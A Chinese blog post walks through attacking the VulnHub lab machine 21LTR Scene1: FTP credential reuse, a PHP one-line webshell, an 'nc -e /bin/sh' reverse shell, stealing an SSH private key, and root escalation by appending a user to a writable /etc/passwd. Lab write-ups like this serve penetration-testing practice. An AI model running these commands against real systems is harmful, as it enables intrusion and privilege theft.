21LTR.com_Scene1_2.120靶机

已于 2024-07-30 20:12:16 修改
阅读量676 收藏 5
点赞数 12
文章标签: 笔记
于 2024-07-30 20:08:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84564260/article/details/140805542
版权

查看靶机的mac地址

使用kail进行扫描ip

发现开放了三个端口

访问ip

查看页面源代码
发现了账号和密码

使用获得的账号和密码在kail连接ftp
ls看一眼 只发现了一个log.php文件

将该文件下载在本地
get backup_log.php

下载下来之后   cat一下该文件

暴力破解一下目录 
发现一个/logs  访问一下

发现访问不到
需要调整10001端口
nc -nv 192.168.2.120 10001
需要一直连  多尝试

我们得到了一个空白的shell 写入一句话木马
<?php system($_GET['cmd']) ?>

然后去浏览器中在url中输入
http://192.168.2.120/logs/backup_login.php?cmd=whoami

现在尝试使用netact在本地机器上获取反向shell
http://192.168.2.120/logs/backup_log.php?cmd=nc -e /bin/sh 192.168.2.120 9999

同时在kail上启动netcat 获取生成的shell

反弹成功

建立交互式的shell:

python -c 'import pty; pty.spawn("/bin/sh")'

提权

cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys    #发现是hbeale用户

查看密钥文件

cat id_rsa

查看/etc/passwd文件验证,发现确实存在hbeale用户:

cat /etc/passwd

尝试用密钥文件登录:

ssh -i id_rsa hbeale@192.168.2.120

登陆成功

但是是低权限用户

利用不安全配置/etc/passwd可写进行提权:

创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd

echo 'newuser:$1$dY7ecSy3$DuiqIJfj/66qr4GMayq1O/:0:0:root:/root:/bin/bash' >> /etc/passwd

su切换newuser用户

Clearlove~7
关注
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 735
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
21 LTR- Scene1 靶机-打靶详细流程
最新发布
10-08
21 LTR- Scene1 靶机-打靶详细流程
21LTR 靶机
weixin_62162207的博客
07-30 164
在端⼝ 10001 上启动了⼀个 netcat 会话,我们得到了⼀个空⽩的 shell,往里写入一个webshell。发现还开放着ssh和ftp端口,尝试利用源代码泄露出的账号密码远程连接。查看authorized_keys 文件,找到一个账户。发现内容可能是一个日志文件,尝试网页打开,打开成功。查看账号信息,发现确实有一个hbeale的账户。查看/etc/passwd文件权限,有写入权限。右键查看页面源代码,发现了一个账号密码。dir发现该目录下有一个文件且是满权限。尝试访问,发现没有权限。
21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
zdd1453691081的博客
07-30 393
【代码】21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
21LTR.com_Scene1_2.120_v1.0靶机复现
weixin_52956666的博客
07-31 299
查看/media/USB_1/Stuff/Keys下的id_rsa文件。将kali和虚拟机都设置为仅主机模式,网段都为192.168.2。使用telnet 192.168.2.120 10001连接。cd到ssh文件下,进行config文件编辑。ls查看有backup_log.php文件。ftp 192.168.2.120连接。密码:zg]E-b0]+8:(58G。输入账号密码发现连接失败。查看源码发现有账号密码。查看内容暂无有价值内容。读取etc/shdow。将文件保存到kali。发现root用户密码。
21LTR.com_Scene1_2.120_v1.0靶机
weixin_71232352的博客
07-30 215
1.查看mac地址并将kali添加一个仅主机模式并使用dhcp分配一个192.168.2.0网段网卡,将靶机设置成仅主机模式。13.kali监听并把网址后边id换成nc%20-e%20/bin/sh%20192.168.2.129%20443。11.在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell。6.发现登录凭证,尝试ssh连接发现失败,尝试ftp连接连接成功。查看/etc/passwd文件验证,发现确实存在hbeale用户。7.ls 发现有一个.php文件。
21LTR: Scene 1靶机
m0_61995767的博客
07-30 613
21LTR: Scene 1打靶记录
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 402
21LTR:Scene1靶机,打靶文章
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 433
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 458
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
LTR.zip_ltr
09-24
标题 "LTR.zip_ltr" 暗示我们关注的焦点是一个与化学工程相关的计算程序,特别是关于液态回流(LTR)的算法。在石油炼制、化工生产等领域,蒸馏塔是重要的分离设备,而液态回流是蒸馏过程中优化效率的关键因素。这个...
LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A
07-15
标题中的“LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A”表明这是一个关于LTR-559ALS光感应器在STM32微控制器上的驱动程序和应用的资源包。关键词“年用量”可能指的是该传感器在特定...
l-sock.zip_linux socket_socket_socket linux_zip
09-14
例如,"i\dw-logo2.gif"可能是一个网站或文档的logo,"i\icon-pdf-ltr.gif"可能表示一个从左到右阅读的PDF文档图标。 综上所述,这个压缩包中的内容很可能详细阐述了如何在Linux环境中使用Socket API进行网络编程,...
tcl.zip_Fish!?_fish_tcl fish_tcl程序_小程序
09-24
2. `i\icon-pdf-ltr.gif` 和 `i\icon-pdf-a4.gif` - 这些图标可能关联于PDF文件的显示,可能是在程序中表示不同方向(左到右`ltr`和可能的A4尺寸)的PDF文档。 3. `i\h-section.gif`, `i\xsection.gif`, `i\section....
笔记)第三期书生·浦语大模型实战营(十一卷王场)–书生基础岛第5关---XTuner 微调个人小助手认知
haidizym的博客
10-06 417
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1tz421B72y/课程文档:关卡作业:https://github.com/InternLM/Tutorial/blob/camp3/docs/L1/XTuner/task.md开发机平台:https://studio.intern-ai.org.cn/
C++学习笔记----8、掌握类与对象(四)---- 不同类型的数据成员(1)
weixin_71738303的博客
10-05 931
c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员,可以生成静态数据成员供所有类的对象共享,const成员,引用成员,reference-to-const成员,等等。本节我们解释一下这些不同类型的数据成员的细节。
笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 552
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
Ltr_retriever安装
07-14
要安装 Ltr_retriever,请按照以下步骤进行操作: 1. 首先,确保您的计算机上已经安装了 Python 3.6 或更高版本。您可以在命令行中运行以下命令来验证您的 Python 版本: ``` python --version ``` 2. 接下来,使用以下命令克隆 Ltr_retriever 仓库: ``` git clone https://github.com/codertimo/LTR-retriever.git ``` 3. 进入 Ltr_retriever 目录: ``` cd LTR-retriever ``` 4. 安装依赖项。您可以使用 pip 来安装所需的 Python 包: ``` pip install -r requirements.txt ``` 5. 安装 ElasticSearch。您可以根据您的操作系统和偏好,选择适合您的安装方法。可以在 ElasticSearch 官方网站上找到相应的安装指南。 6. 配置 ElasticSearch。在 `LTR-retriever/configs` 目录下,有一些示例配置文件可以供您参考。您可以根据您的需求进行相应的修改。 7. 运行 Ltr_retriever。您可以通过运行以下命令来启动 Ltr_retriever: ``` python main.py ``` 这样,您就成功安装了 Ltr_retriever。请注意,这只是一个简单的安装指南,具体的步骤可能会根据您的操作系统和环境而有所不同。如有需要,请参考 Ltr_retriever 仓库中的文档和指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值